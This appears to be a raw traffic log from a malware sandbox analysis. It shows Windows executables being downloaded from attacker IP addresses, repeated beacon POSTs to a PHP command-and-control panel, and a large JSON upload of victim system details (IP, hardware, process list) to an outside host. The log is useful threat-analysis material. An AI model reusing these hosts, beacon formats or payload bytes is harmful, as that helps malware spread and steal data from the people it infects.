00 42 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 46 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:03:36 GMTContent-Type: application/octet-streamContent-Length: 1836544Last-Modified: Sun, 15 Dec 2024 23:57:32 GMTConnection: keep-aliveETag: "675f6cec-1c0600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 4e e0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2b 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 6b 61 75 61 69 77 6d 00 70 1a 00 00 20 50 00 00 62 1a 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 70 6b 76 68 7a 62 63 00 10 00 00 00 90 6a 00 00 04 00 00 00 e0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 6a 00 00 22 00 00 00 e4 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:03:57 GMTContent-Type: application/octet-streamContent-Length: 3026432Last-Modified: Sun, 15 Dec 2024 23:57:40 GMTConnection: keep-aliveETag: "675f6cf4-2e2e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 32 00 00 04 00 00 5b be 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 c2 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c2 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 70 74 69 75 79 76 78 74 00 20 2b 00 00 b0 06 00 00 14 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 7a 79 71 73 6f 6b 75 00 10 00 00 00 d0 31 00 00 04 00 00 00 08 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 31 00 00 22 00 00 00 0c 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:04:18 GMTContent-Type: application/octet-streamContent-Length: 2779136Last-Modified: Sun, 15 Dec 2024 23:56:01 GMTConnection: keep-aliveETag: "675f6c91-2a6800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2b 00 00 04 00 00 eb 67 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6e 70 72 76 70 6c 75 61 00 20 2a 00 00 a0 00 00 00 08 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 74 79 78 6b 6e 6c 71 00 20 00 00 00 c0 2a 00 00 04 00 00 00 42 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2a 00 00 22 00 00 00 46 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 16 Dec 2024 00:04:29 GMTContent-Type: application/octet-streamContent-Length: 1836544Last-Modified: Sun, 15 Dec 2024 23:57:32 GMTConnection: keep-aliveETag: "675f6cec-1c0600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 4e e0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2b 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 6b 61 75 61 69 77 6d 00 70 1a 00 00 20 50 00 00 62 1a 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 70 6b 76 68 7a 62 63 00 10 00 00 00 90 6a 00 00 04 00 00 00 e0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 6a 00 00 22 00 00 00 e4 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: GET /77/uploads/Odavmyskfc.pdf HTTP/1.1Host: woo097878781.winConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /77/uploads/Odavmyskfc.pdf HTTP/1.1Host: woo097878781.winConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 46 37 36 42 33 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12F76B35A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                            Source: global trafficHTTP traffic detected: GET /files/5131681669/sUSFJjY.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 37 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015781001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/5444530229/XpAg0vN.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 38 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015819001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 38 32 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015821001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 38 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015822001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 38 32 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015823001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 38 32 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015824001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 38 32 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015825001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: POST /kJZQfgRLErzqwUgdaDCN1734167391 HTTP/1.1Host: home.fivegr5sb.topAccept: */*Content-Type: application/jsonContent-Length: 441684Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 33 30 37 33 32 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
                            Source: global trafficHTTP traffic detected: GET /kJZQfgRLErzqwUgdaDCN1734167391?argument=NqSXGMT29bBsoKvm1734307336 HTTP/1.1Host: home.fivegr5sb.topAccept: */*
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 38 32 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015826001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 38 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015827001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 38 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015828001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 38 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015829001&unit=246122658369
                            Source: global trafficHTTP traffic detected: GET /files/flava/random.exe HTTP/1.1Host: 31.41.244.11
